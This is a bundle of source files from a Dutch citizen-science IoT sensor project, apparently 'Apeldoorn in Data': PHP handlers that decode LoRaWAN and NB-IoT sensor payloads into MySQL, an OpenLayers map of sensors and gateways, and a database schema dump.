$sql = 'INSERT INTO gpslocation1 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->gps_1->latitude).', Lon='.addslashes($data->payload_fields->gps_1->longitude).', Alt='.addslashes($data->payload_fields->gps_1->altitude).', Hdop='.addslashes($data->payload_fields->analog_in_2);
logerror("Rawpostttnmappersql: ".$sql);
//echo $sql;
$result = mysqlquery($sql);
$last_id = mysql_insert_id($connection);
//logerror('Result: '.$last_id);
foreach($data->metadata->gateways as $gateway)
{
$json = '{'."\n";
$json .= '"time":"'.substr($data->metadata->time, 0, 23).'",'."\n";
$json .= '"devid":"'.$data->dev_id.'",'."\n";
$json .= '"appid":"'.$data->app_id.'",'."\n";
$json .= '"gwaddr":"'.$gateway->gtw_id.'",'."\n";
$json .= '"snr":"'.$gateway->snr.'",'."\n";
$json .= '"rssi":"'.$gateway->rssi.'",'."\n";
$json .= '"freq":"'.$data->metadata->frequency.'",'."\n";
$json .= '"datarate":"'.$data->metadata->data_rate.'",'."\n";
$json .= '"lat":"'.$data->payload_fields->gps_1->latitude.'",'."\n";
$json .= '"lon":"'.$data->payload_fields->gps_1->longitude.'",'."\n";
$json .= '"appeui":"70B3D57EF0006373",'."\n";
$json .= '"alt":"'.$data->payload_fields->gps_1->altitude.'",'."\n";
$json .= '"accuracy":"'.$data->payload_fields->analog_in_2.'",'."\n";
$json .= '"provider":"gps",'."\n";
$json .= '"user_id":"<NAME>"'."\n";
//$json .= ', "experiment":"Industrial IT GPS tracker Test"'."\n";
$json .= '}';
logerror("TTN MapperJson: ".$json);
$sql1 = 'INSERT INTO gpsgateway SET Gpslocationid=\''.$last_id.'\', Gwid=\''.addslashes($gateway->gtw_id).'\', Channel=\''.addslashes($gateway->channel).'\', Rssi=\''.addslashes($gateway->rssi).'\', Snr=\''.addslashes($gateway->snr).'\'';
//echo $sql1;
logerror("GPS data: ".$sql1);
$result1 = mysqlquery($sql1);
$url = "http://ttnmapper.org/api/";
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_HEADER, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_HTTPHEADER, array("Content-type: application/json"));
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $json);
logerror("voor curl");
$json_response = curl_exec($curl);
logerror("na curl");
$status = curl_getinfo($curl, CURLINFO_HTTP_CODE);
logerror("curl status: ".$status);
if ( $status != 200 ) {
logerror("Error: call to URL $url failed with status $status, response $json_response, curl_error " . curl_error($curl) . ", curl_errno " . curl_errno($curl));
die("Error: call to URL $url failed with status $status, response $json_response, curl_error " . curl_error($curl) . ", curl_errno " . curl_errno($curl));
}
logerror("curl voor close");
curl_close($curl);
logerror("curl na close");
logerror("TTN MapperJson response: ".$json_response);
$response = json_decode($json_response, true);
logerror("TTN MapperJson responsejson: ".$response);
}
}
break;
}
}
//{"app_id":"industrialit","dev_id":"node1","hardware_serial":"0000000002E00612","port":1,"counter":8416,"payload_raw":"MTYuNzszOC4xAGxkIQ==","payload_fields":{"byte1":49,"byte2":54,"byte3":46,"byte4":55,"byte5":59,"byte6":51,"byte7":56,"byte8":46,"byte9":49},"metadata":{"time":"2017-06-04T20:54:21.770859698Z","frequency":867.1,"modulation":"LORA","data_rate":"SF7BW125","coding_rate":"4/5","gateways":[{"gtw_id":"eui-aa555a0000088213","timestamp":2927612339,"time":"2017-06-04T20:54:19.648782Z","channel":3,"rssi":-118,"snr":-6,"latitude":52.21176,"longitude":5.96243,"altitude":65}]},"downlink_url":"https://integrations.thethingsnetwork.org/ttn-eu/api/v2/down/industrialit/cloudscada?key=<KEY>"}
?>
<file_sep>// get last hour sensor data
var sensorHourStyleCache = {};
var sensorHourDataLayer = new ol.layer.Vector({
title: 'sensoren vandaag',
source: new ol.source.Cluster({
distance: 40,
source: new ol.source.Vector({
url: 'data/sensors_json.php',
defaultProjection: 'EPSG:4326',
projection: 'EPSG:28992',
format: new ol.format.GeoJSON()
})
}),
style: function(feature, resolution) {
var size = feature.get('features').length;
var style = sensorHourStyleCache[size];
if (!style) {
var label = '';
if (size>1) label = size.toString();
style = [new ol.style.Style({
image: new ol.style.Icon(({
scale: 0.4,
anchor: [0, 1.0],
anchorXUnits: 'fraction',
anchorYUnits: 'fraction',
opacity: 0.75,
src: 'images/sensor.png'
})),
text: new ol.style.Text({
text: label,
offsetX: 5,
offsetY: -6,
fill: new ol.style.Fill({
color: '#000'
})
})
})];
sensorHourStyleCache[size] = style;
}
return style;
}
});
// get all sensor data
var sensorAllStyleCache = {};
var sensorAllDataLayer = new ol.layer.Vector({
visible: false,
title: 'sensoren alles',
source: new ol.source.Cluster({
distance: 40,
source: new ol.source.Vector({
url: 'data/sensors_json.php?select=all',
defaultProjection: 'EPSG:4326',
projection: 'EPSG:28992',
format: new ol.format.GeoJSON()
})
}),
style: function(feature, resolution) {
var size = feature.get('features').length;
var style = sensorAllStyleCache[size];
if (!style) {
var label = '';
if (size>1) label = size.toString();
style = [new ol.style.Style({
image: new ol.style.Icon(({
scale: 0.4,
anchor: [0, 1.0],
anchorXUnits: 'fraction',
anchorYUnits: 'fraction',
opacity: 0.75,
src: 'images/sensor.png'
})),
text: new ol.style.Text({
text: label,
offsetX: 5,
offsetY: -6,
fill: new ol.style.Fill({
color: '#000'
})
})
})];
sensorAllStyleCache[size] = style;
}
return style;
}
});
// get getways
var gatewayStyleCache = {};
var gatewayDataLayer = new ol.layer.Vector({
title: 'gateways',
source: new ol.source.Cluster({
distance: 40,
source: new ol.source.Vector({
url: 'data/gateways_json.php',
defaultProjection: 'EPSG:4326',
projection: 'EPSG:28992',
format: new ol.format.GeoJSON()
})
}),
style: function (feature, resolution) {
var size = feature.get('features').length;
var style = gatewayStyleCache[size];
if (!style) {
var label = '';
if (size > 1) label = size.toString();
style = [new ol.style.Style({
image: new ol.style.Icon(({
scale: 1,
anchor: [0.5, 1],
anchorXUnits: 'fraction',
anchorYUnits: 'fraction',
opacity: 0.75,
src: 'images/ttn.png'
})),
text: new ol.style.Text({
text: label,
offsetX: 0,
offsetY: 0,
fill: new ol.style.Fill({
color: '#000'
})
})
})];
gatewayStyleCache[size] = style;
}
return style;
}
});
function dataPopups(evt) {
// Hide existing popup and reset it's offset
popup.hide();
popup.setOffset([0, 0]);
// Attempt to find a feature in one of the visible vector layers
var feature = map.forEachFeatureAtPixel(evt.pixel, function(feature, layer) {
return feature;
});
//feature = feature.get('features')[0];
// if (feature) {
// var coord = feature.getGeometry().getCoordinates();
// var props = feature.getProperties();
// var info;
// if (feature != null) {
// info = '<h2>' + feature.o[0].location + '</h2>';
// info += '<i>' + feature.o[0].timestamp + '</i><br/>';
// var arrayTags = $.map(feature.o, function (value, index) {
// return [value];
// });
// for (index = 0; index < arrayTags.length; ++index) {
// if (arrayTags[index].name != undefined && arrayTags[index].value != undefined) {
// info += arrayTags[index].name + ': ' + arrayTags[index].value + '<br/>';
// }
// }
// }
// // Offset the popup so it points at the middle of the marker not the tip
// popup.setOffset([10, -60]);
// popup.show(coord, info);
// }
if (feature != null) {
feature = feature.get('features')[0];
if (feature) {
console.log('Click');
var coord = feature.getGeometry().getCoordinates();
var props = feature.getProperties();
var info;
if (feature != null) {
if (feature.N[0].type == 'sensor') {
info = '<p width="800" height="800">';
info += '<h2>' + feature.N[0].location + '</h2>';
info += '<i>' + feature.N[0].timestamp + '</i><br/>';
var arrayTags = $.map(feature.S, function (value, index) {
return [value];
});
for (index = 0; index < arrayTags.length; ++index) {
if (arrayTags[index].name != undefined && arrayTags[index].value != undefined) {
info += arrayTags[index].name + ': ' + arrayTags[index].value + '<br/>';
}
}
info += '<iframe src="https://apeldoornindata.nl/data/chart.php?id=' + feature.N[0].nodeid + '" frameborder="0" height="100" scrolling="no"></iframe>';
info += '<a href="https://apeldoornindata.nl/data/node.php?id=' + feature.N[0].nodeid + '">Data</a><br/>';
info += '</p>';
} else {
info = '<p width="800" height="300">';
info += '<b>' + feature.N[0].location + '</b><br/>';
info += '<i>' + feature.N[0].timestamp + '</i><br/>';
var arrayTags = $.map(feature.S, function (value, index) {
return [value];
});
info += '<a href="http://ttnmapper.org/?gateway=' + feature.N[0].location.replace("eui-", "").toUpperCase() + '&type=radar" target="_blanc">TTN Mapper</a><br/>';
info += '</p>';
}
}
// Offset the popup so it points at the middle of the marker not the tip
popup.setOffset([10, -60]);
popup.autoSize = false;
//popup.setSize(new ol.source.size(500, 300));
popup.show(coord, info);
}
} else {
console.log('null object');
}
}
<file_sep><?php
function getElsysArray($payloadraw) {
$payload = bin2hex(base64_decode($payloadraw));
$arrPayload = hexToBytes($payload);
$returnArray = array();
for($i=0; $i < count($arrPayload); $i++) {
switch($arrPayload[$i]) {
case '01': // Temperature
$temp = hexdec($arrPayload[$i + 1]) * 256 + hexdec($arrPayload[$i + 2]);
$returnArray['temperature'] = $temp / 10;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
$i = $i + 2;
break;
case '02': // Humidity
$rh = hexdec($arrPayload[$i + 1]);
$returnArray['humidity'] = $rh;
//echo 'RH '.$returnArray['humidity'].'<br/>';
$i = $i + 1;
break;
case '03': // Acceleration
$returnArray['x'] = hexdec($arrPayload[$i + 1]);
$returnArray['y'] = hexdec($arrPayload[$i + 2]);
$returnArray['z'] = hexdec($arrPayload[$i + 3]);
$i = $i + 3;
break;
case '04': // Light
$light = hexdec($arrPayload[$i + 1]) * 256 + hexdec($arrPayload[$i + 2]);
$returnArray['light'] = $light;
//echo 'Light '.$returnArray['light'].'<br/>';
$i = $i + 2;
break;
case '05': // Motion sensor(PIR)
$pir = hexdec($arrPayload[$i + 1]);
$returnArray['pir'] = $pir;
//echo 'PIR '.$returnArray['pir'].'<br/>';
$i = $i + 1;
break;
case '06': // Co2
$cotwo = hexdec($arrPayload[$i + 1]) * 256 + hexdec($arrPayload[$i + 2]);
$returnArray['co2'] = $cotwo;
//echo 'CO2 '.$returnArray['co2'].'<br/>';
$i = $i + 2;
break;
case '07': // VDD battery
$vdd = hexdec($arrPayload[$i + 1]) * 256 + hexdec($arrPayload[$i + 2]);
$returnArray['vdd'] = $vdd;
//echo 'VDD '.$returnArray['vdd'].'<br/>';
$i = $i + 2;
break;
case '08': // Analog in 1
$ai1 = hexdec($arrPayload[$i + 1]) * 256 + hexdec($arrPayload[$i + 2]);
$returnArray['ai1'] = $ai1;
//echo 'Ai1 '.$returnArray['ai1'].'<br/>';
$i = $i + 2;
break;
case '09': // GPS
$returnArray['lat'] = hexdec($arrPayload[$i + 1]) * 256 * 256 + hexdec($arrPayload[$i + 2]) * 256 + hexdec($arrPayload[$i + 3]);
$returnArray['lon'] = hexdec($arrPayload[$i + 4]) * 256 * 256 + hexdec($arrPayload[$i + 5]) * 256 + hexdec($arrPayload[$i + 6]);
//echo 'Lat '.$returnArray['lat'].'<br/>';
//echo 'Lat '.$returnArray['lon'].'<br/>';
$i = $i + 6;
break;
case '0A': // Pulse
$temp = hexdec($arrPayload[$i + 1]) * 256 + hexdec($arrPayload[$i + 2]);
$returnArray['pulse'] = $temp;
//echo 'pulse '.$returnArray['pulse'].'<br/>';
$i = $i + 2;
break;
case '0B': // Pulse input 1 absolute value
$returnArray['pulseabs'] = hexdec($arrPayload[$i + 1]) * 256 * 256 * 256 + hexdec($arrPayload[$i + 2]) * 256 * 256 + hexdec($arrPayload[$i + 3]) * 256 + hexdec($arrPayload[$i + 4]);
//echo 'Pulse '.$returnArray['pulseabs'].'<br/>';
$i = $i + 4;
break;
case '0C': // Temperature external
$temp = hexdec($arrPayload[$i + 1]) * 256 + hexdec($arrPayload[$i + 2]);
$returnArray['temperatureext'] = $temp / 10;
//echo 'Temp '.$returnArray['temperatureext'].'<br/>';
$i = $i + 2;
break;
case '10': // IR Temperature
$temp = hexdec($arrPayload[$i + 1]) * 256 + hexdec($arrPayload[$i + 2]);
$returnArray['irtempint'] = $temp / 10;
//echo 'Temp '.$returnArray['temperatureext'].'<br/>';
$temp = hexdec($arrPayload[$i + 3]) * 256 + hexdec($arrPayload[$i + 4]);
$returnArray['irtempext'] = $temp / 10;
//echo 'Temp '.$returnArray['temperatureext'].'<br/>';
$i = $i + 4;
break;
case '11': // Occupancy
$pir = hexdec($arrPayload[$i + 1]);
$returnArray['occupancy'] = $pir;
//echo 'PIR '.$returnArray['pir'].'<br/>';
$i = $i + 1;
break;
}
}
return $returnArray;
}
if(!function_exists('hexToBytes')){
function hexToBytes($hex) {
$bytes = array();
echo 'Payload lenght: '.strlen($hex).'<br/>';
for ($c = 0; $c < strlen($hex); $c += 2) {
array_push($bytes, substr($hex, $c, 2));
}
return $bytes;
}
}
?><file_sep><?php
include('db.php');
$sql = 'SELECT * FROM ttngateways WHERE Lastseen >= DATE_SUB(NOW(), INTERVAL 7 DAY)';
//echo $sql;
$arrSensorData = array("type" => "FeatureCollection", "features" => array());
$arrMeasurement = array();
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
//var_dump($row1);
$arrProperties = null;
$arrProperties["type"] = "gateway";
$arrProperties["location"] = $row["Gwid"];
$arrProperties["name"] = $row["Gwid"];
$arrProperties["timestamp"] = $row["Lastseen"];
$arrMeasurementItem["properties"][] = $arrProperties;
$arrMeasurementItem["type"] = "Feature";
$arrMeasurementItem["name"] = $row["Gwid"];
$arrMeasurementItem["geometry"] = array("type" => "Point", "coordinates" => array(floatval($row["Longitude"]), floatval($row["Latitude"])));
$arrMeasurement[] = $arrMeasurementItem;
$arrMeasurementItem = null;
}
$arrSensorData["features"] = $arrMeasurement;
echo json_encode($arrSensorData, JSON_PRETTY_PRINT);
exit();
?>
{
"type": "FeatureCollection",
"features": [{
"type": "Feature",
"geometry": {
"type": "Point",
"coordinates": [5.943877, 52.1843 ]
}
}
]
}<file_sep><?php
include('db.php');
?>
<!DOCTYPE html>
<html class="no-js">
<head>
<meta http-equiv="refresh" content="60">
<?php
include('headinclude.php');
?>
<link rel="stylesheet" href="https://apeldoornindata.nl/style/detailpages.css" >
</head>
<body>
<?php
include('menu.php');
echo '<div class="container-fluid">'."\n";
$totalPackages = 0;
$sql = 'SELECT * FROM gateway WHERE Lastmessage >= DATE_SUB(NOW(),INTERVAL 14 DAY) ORDER BY Packets DESC LIMIT 1000';
//echo $sql;
$result = mysqlquery($sql);
echo '<table border="1">';
echo '<tr><th>Gateway</th><th>Name</th><th>Last</th><th>Packets</th><th>Ch0</th><th>Ch1</th><th>Ch2</th><th>Ch3</th><th>Ch4</th><th>Ch5</th><th>Ch6</th><th>Ch7</th><th>Sf7</th><th>Sf8</th><th>Sf9</th><th>Sf10</th><th>Sf11</th><th>Sf12</th></tr>';
while ($row = mysqli_fetch_array($result))
{
echo '<tr>';
echo '<td>'.$row['Gateway'].'</td>';
echo '<td>'.$row['Name'].'</td>';
$utc_date = DateTime::createFromFormat(
'Y-m-d H:i:s',
$row['Lastmessage'],
new DateTimeZone('UTC')
);
$localTime = $utc_date;
$localTime->setTimeZone(new DateTimeZone('Europe/Amsterdam'));
echo '<td>'.$localTime->format('Y-m-d H:i:s').'</td>';
echo '<td class="alnright">'.number_format($row['Packets'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Ch0'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Ch1'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Ch2'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Ch3'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Ch4'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Ch5'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Ch6'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Ch7'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Sf7'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Sf8'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Sf9'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Sf10'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Sf11'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Sf12'], 0, '', '.').'</td>';
echo '</tr>'."\n";
$totalPackages += $row['Packets'];
}
echo '<tr>';
echo '<td></td>';
echo '<td></td>';
echo '<td class="alnright"><strong>Totaal:</strong></td>';
echo '<td class="alnright"><strong>'.number_format($totalPackages, 0, '', '.').'</strong></td>';
echo '<td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td>';
echo '</tr>'."\n";
echo '</table>';
include('../footer.php');
echo '</div> <!-- /.container -->'."\n"; //container
include('jsendinclude.php');
?>
</body>
</html><file_sep><?php
include('db.php');
logerror('start Cron 1 day');
echo 'Starting 1day cron<br/>';
$sqlTruncate = 'TRUNCATE apeldoornindata.ttngateways';
//echo $sqlTruncate.'<br/>';
mysqlquery($sqlTruncate);
$c = curl_init('http://noc.thethingsnetwork.org:8085/api/v2/gateways');
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
//curl_setopt(... other options you want...)
$html = curl_exec($c);
if (curl_error($c))
die(curl_error($c));
// Get the status code
$status = curl_getinfo($c, CURLINFO_HTTP_CODE);
curl_close($c);
$jsonGateways = json_decode($html);
foreach((array) $jsonGateways->statuses as $key => $jsonGateway) {
$gatewayId = $key;
$lastSeen = $jsonGateway->timestamp;
$lat = null;
$lon = null;
if(isset($jsonGateway->location->latitude)) {
$lat = $jsonGateway->location->latitude;
}
if(isset($jsonGateway->location->longitude)) {
$lon = $jsonGateway->location->longitude;
}
//vardump($key);
//vardump($jsonGateway);
$sqlInsert = 'INSERT INTO apeldoornindata.ttngateways SET Gwid = \''.$gatewayId.'\', Lastseen = \''.$lastSeen.'\'';
if($lat != null && $lat != null) {
$sqlInsert .= ', Latitude = \''.$lat.'\', longitude = \''.$lon.'\'';
//echo $sqlInsert.'<br/>';
mysqlquery($sqlInsert);
}
$sqlInsert='';
}
logerror('End Cron 1 day');
?><file_sep><?php
include('db.php');
logInfo('start nbiotdata');
/*
logInfo("Postcount: ". count($_POST));
logInfo(implode(",", $_POST));
logInfo("Requestcount: ". count($_REQUEST));
logInfo(implode(",", $_REQUEST));
logInfo("Getcount: ". count($_GET));
logInfo(implode(",", $_GET));
$data = file_get_contents('php://input');
logInfo("input: ".$data);
logInfo($HTTP_RAW_POST_DATA);
$data = file_get_contents('php://stdin');
logInfo('stdin: '.$data);
logInfo("Rawpost: ".$HTTP_RAW_POST_DATA);
//var_dump($data);
*/
logInfo("input: ".json_encode(file_get_contents('php://input')));
/*logInfo("stdin: ".json_encode(file_get_contents('php://stdin')));
logInfo("HTTP_RAW_POST_DATA: ".json_encode($HTTP_RAW_POST_DATA));
logInfo("_GET: ".json_encode($_GET));
logInfo("_POST: ".json_encode($_POST));
logInfo("_REQUEST: ".json_encode($_REQUEST));
//logInfo("getallheaders: ".json_encode(getallheaders()));
*/
echo 'Thanks';
$ruweData = file_get_contents('php://input');
if($ruweData != null) {
$sql = 'INSERT INTO nbiotraw SET Moment=NOW(), Data= \''.addslashes($ruweData).'\', Nodeid=16';
//logInfo('sql: '.$sql);
//echo $sql;
$result = mysqlquery($sql);
$dateNow = date('Y-m-d H:i:s');
$data = json_decode($ruweData);
logInfo("Deviceid: ".$data->reports[0]->serialNumber);
switch($data->reports[0]->serialNumber) {
case 'IMEI:357518080039852':
logInfo("Payload: ".$data->reports[0]->value);
//$decoded = base64_decode($data->reports[0]->value);
$decoded = $data->reports[0]->value;
logInfo("Decoded: ".$decoded);
$temperature = substr($decoded, 0, 4);
$temperature = hexdec($temperature)/100;
logInfo("Temperature: ".$temperature);
$sql = 'INSERT INTO measurement38 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($temperature);
//echo $sql;
$result = mysqlquery($sql);
$humidity = substr($decoded, 4, 4);
$humidity = hexdec($humidity)/100;
logInfo("Humidity: ".$humidity);
$sql = 'INSERT INTO measurement39 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($humidity);
//echo $sql;
$result = mysqlquery($sql);
$pressure = substr($decoded, 8, 4);
$pressure = hexdec($pressure);
logInfo("Pressure: ".$pressure);
$sql = 'INSERT INTO measurement40 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($pressure);
//echo $sql;
$result = mysqlquery($sql);
$lat = substr($decoded, 12, 8);
$lat = hexdec($lat)/100000;
$lon = substr($decoded, 20, 8);
$lon = hexdec($lon)/100000;
logInfo("Lat: ".$lat);
logInfo("Lon: ".$lon);
$sql = 'INSERT INTO gpslocation16 SET Moment=\''.$dateNow.'\', Lat='.addslashes($lat).', Lon='.addslashes($lon);
//echo $sql;
$result = mysqlquery($sql);
$accelX = substr($decoded, 28, 4);
$accelX = hexdec($accelX)/100 - 100;
logInfo("AccelX: ".$accelX);
$sql = 'INSERT INTO measurement41 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($accelX);
//echo $sql;
$result = mysqlquery($sql);
$accelY = substr($decoded, 32, 4);
$accelY = hexdec($accelY)/100 - 100;
logInfo("AccelY: ".$accelY);
$sql = 'INSERT INTO measurement42 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($accelY);
//echo $sql;
$result = mysqlquery($sql);
$accelZ = substr($decoded, 36, 4);
$accelZ = hexdec($accelZ)/100 - 100;
logInfo("AccelZ: ".$accelZ);
$sql = 'INSERT INTO measurement43 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($accelZ);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastmessage=\''.$dateNow.'\', Packets = Packets + 1';
if($lat != 0 && $lat != 0) {
$sql .= ', Lastlocationlat = '.addslashes($lat).', Lastlocationlon = '.addslashes($lon);
}
$sql .= ' WHERE Id=16';
//echo $sql;
$result = mysqlquery($sql);
break;
}
}
?><file_sep><!DOCTYPE html>
<html>
<head>
<title>Apeldoorn in Data</title>
<link rel="icon" href="favicon.ico" type="image/x-icon">
<!-- Load OpenLayers and plugins: popup, layerswitcher -->
<link rel="stylesheet" href="https://openlayers.org/en/v4.6.5/css/ol.css" type="text/css">
<script src="https://openlayers.org/en/v4.6.5/build/ol.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/proj4js/2.4.3/proj4.js" type="text/javascript"></script>
<script src="https://epsg.io/28992-1753.js"></script>
<link rel="stylesheet" href="https://rawgit.com/walkermatt/ol3-popup/master/src/ol3-popup.css" type="text/css">
<script src="https://rawgit.com/walkermatt/ol3-popup/master/src/ol3-popup.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/openlayers.layerswitcher/1.1.0/ol3-layerswitcher.css" type="text/css">
<script src="https://cdn.jsdelivr.net/openlayers.layerswitcher/1.1.0/ol3-layerswitcher.js"></script>
<!-- Load Apeldoorn In Data javascript and stylesheet -->
<link rel="stylesheet" type="text/css" href="style/apeldoornindata.css" media="all" />
<!-- <script src="js/apeldoornindata.js"></script> -->
<script src="js/mapfunctions.js"></script>
<script src="js/backgroundlayers.js"></script>
<script src="js/datalayers.js"></script>
<script src="js/maplayers.js"></script>
<?php
include('data/headinclude.php');
?>
</head>
<body id="body" style="text-align: center; margin:0px; ">
<?php
include('data/db.php');
include('data/menu.php');
//echo '<div class="container">'."\n";
?>
<!--[if lt IE 10]>
<p class="browsehappy">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
<![endif]-->
<div id="map">
<div id="popup" class="ol-popup">
<a href="#" id="popup-closer" class="ol-popup-closer"></a>
<div id="popup-content"></div>
</div>
</div>
<div id="logo">
<img src="images/logo.png" width="100%"/>
</div>
<div id="legend">
</div>
<script>
"use strict";
var data = null;
var canvas;
var context;
var canvasOrigin;
var delta;
var width;
var height;
var bbox;
var timer = null;
var map;
// code to rescale map and ahn overlay when zooming or changing window size
function redisplay() {
// clear canvas
if (context) {
var imgData = context.getImageData(0,0,width,height);
for(var i=0;i<imgData.length;i++) imgData[i] = 0;
context.putImageData(imgData,0,0);
map.renderSync();
}
// draw heatmap
if (data!=null) drawHeatmap(context, map, data, 'legend');
}
var canvasFunction = function(extent, resolution, pixelRatio, size, projection) {
canvas = document.createElement('canvas');
context = canvas.getContext('2d');
width = Math.round(size[0]), height = Math.round(size[1]);
canvas.setAttribute('width', width);
canvas.setAttribute('height', height);
// Canvas extent is different than map extent, so compute delta between
// left-top of map and canvas extent.
var mapExtent = map.getView().calculateExtent(map.getSize())
var mapOrigin = map.getPixelFromCoordinate([mapExtent[0], mapExtent[3]]);
canvasOrigin = map.getPixelFromCoordinate([extent[0], extent[3]]);
delta = [mapOrigin[0]-canvasOrigin[0], mapOrigin[1]-canvasOrigin[1]]
return canvas;
};
var heatmap = new ol.source.ImageCanvas({
canvasFunction: canvasFunction
});
map = new ol.Map({
target: 'map',
renderer: 'canvas', // Force the renderer to be used
layers: [
new ol.layer.Group({
title: 'Achtergrond',
layers: [
topografie,
luchtfoto,
ahn
]
}),
//new ol.layer.Group({
// title: 'Kaarten',
// layers: [
// hittekaart
// ]
//}),
new ol.layer.Group({
title: 'Data',
layers: [
gatewayDataLayer,
sensorAllDataLayer,
sensorHourDataLayer
]
})
],
view: new ol.View({
center: ol.proj.transform([5.967808, 52.210973], 'EPSG:4326', 'EPSG:900913'),
zoom: 13
})
});
// add layer switcher
var layerSwitcher = new ol.control.LayerSwitcher();
map.addControl(layerSwitcher);
// add data popup routines
var popup = new ol.Overlay.Popup();
map.addOverlay(popup);
map.on('singleclick', dataPopups);
// callback routines for zoom and drag operations
map.getView().on('propertychange', function(e) {
switch (e.key) {
case 'zoom':
case 'center':
case 'resolution':
redisplay();
break;
}
});
window.addEventListener("resize", redisplay);
function selectSlam(id, reload = false) {
if (!reload && context) heatmap.refresh();
var xhttp = new XMLHttpRequest();
if (data==null) document.getElementById('download').innerHTML = 'data ophalen...';
xhttp.open('GET', 'slamdata_json.php?date='+id, true);
// xhttp.open('GET', 'slamdata_json.php?date='+id+'&calibrate', true);
xhttp.responseType = 'json';
xhttp.onload = function() {
if (xhttp.status == 200) {
data = xhttp.response;
document.getElementById('download').innerHTML = '<input type="button" onclick="window.open(\'http://www.meetjestad.net/data/slamdata.php?date=' + id + '\', \'_blank\');" value="ga naar data"/>';
if (!reload) focusMapOnData(map, data);
drawHeatmap(context, map, data, 'legend');
if (timer) clearInterval(timer);
timer = setInterval(function(){selectSlam(id, true);}, 10000);
}
};
xhttp.send();
}
</script>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-100353310-1', 'auto');
ga('send', 'pageview');
</script>
<script type="text/javascript">
window.smartlook||(function(d) {
var o=smartlook=function(){ o.api.push(arguments)},h=d.getElementsByTagName('head')[0];
var c=d.createElement('script');o.api=new Array();c.async=true;c.type='text/javascript';
c.charset='utf-8';c.src='https://rec.smartlook.com/recorder.js';h.appendChild(c);
})(document);
smartlook('init', 'ec0a1db895268f5147945b6ff6c3e176bd0006a6');
</script>
<?php
include('data/jsendinclude.php');
?>
</body>
</html>
<file_sep>-- MySQL dump 10.13 Distrib 8.0.13, for Win64 (x86_64)
--
-- Host: apeldoornindata.nl Database: apeldoornindata
-- ------------------------------------------------------
-- Server version 5.5.5-10.1.41-MariaDB-0+deb9u1
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
SET NAMES utf8 ;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Table structure for table `gateway`
--
DROP TABLE IF EXISTS `gateway`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `gateway` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Gateway` text NOT NULL,
`Name` text NOT NULL,
`Ch0` bigint(20) NOT NULL,
`Ch1` bigint(20) NOT NULL,
`Ch2` bigint(20) NOT NULL,
`Ch3` bigint(20) NOT NULL,
`Ch4` bigint(20) NOT NULL,
`Ch5` bigint(20) NOT NULL,
`Ch6` bigint(20) NOT NULL,
`Ch7` bigint(20) NOT NULL,
`Sf7` bigint(20) NOT NULL,
`Sf8` bigint(20) NOT NULL,
`Sf9` bigint(20) NOT NULL,
`Sf10` bigint(20) NOT NULL,
`Sf11` bigint(20) NOT NULL,
`Sf12` bigint(20) NOT NULL,
`Lastmessage` datetime NOT NULL,
`Packets` bigint(20) NOT NULL DEFAULT '0',
PRIMARY KEY (`Id`),
UNIQUE KEY `Gateway_UNIQUE` (`Gateway`(50))
) ENGINE=MyISAM AUTO_INCREMENT=464 DEFAULT CHARSET=latin1;
